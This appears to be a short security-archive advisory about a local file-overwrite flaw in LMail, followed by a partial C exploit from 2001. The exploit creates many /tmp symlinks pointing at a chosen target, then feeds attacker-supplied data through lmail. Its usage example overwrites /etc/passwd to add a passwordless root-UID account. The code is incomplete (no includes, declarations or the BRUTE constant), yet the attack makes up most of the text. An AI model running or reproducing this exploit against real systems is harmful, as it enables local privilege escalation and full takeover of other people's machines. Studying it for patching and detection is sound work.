A security vulnerability in LMail allows local attackers to overwrite (and create) any file they desire. This essentially allows an attacker to completely compromise the system. The following is an exploit code that can be used by an administrator to verify whether they are vulnerable to this security problem.
Exploit:
/* lmail-xpl.c
*
* Quick hack to exploit lmail
*
* Simply run it with the file you want to create/overwrite
* and the data you wish to place in the file.
*
* Example:
*
* $ gcc -g -Wall lmail-xpl.c -o lmail-xpl
* $ ./lmail-xpl /etc/passwd owned::0:0::/root:/bin/bash
*
* Then login as owned... etc..
*
* by Charles Stevenson <core@ezlink.com>
*
* July 04 2001
*
* shoutz b10z
*/
/* set the date/time */
sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
system(temp);
pid = getpid();
fprintf(stderr, "> creating a lot of symlinks\n");
for (i=0;i<BRUTE;i++){
sprintf(temp, "/tmp/lmail%d", pid+i);
symlink(argv[1], temp);
}
sprintf(temp, "/bin/echo `perl -e 'print \"\\n\"'`%s | lmail -f\n", argv[2]);
fprintf(stderr, "Running a few times since I'm lazy.\n");
for (i=0;i<BRUTE;i++){
system(temp);
//sleep(1);
}
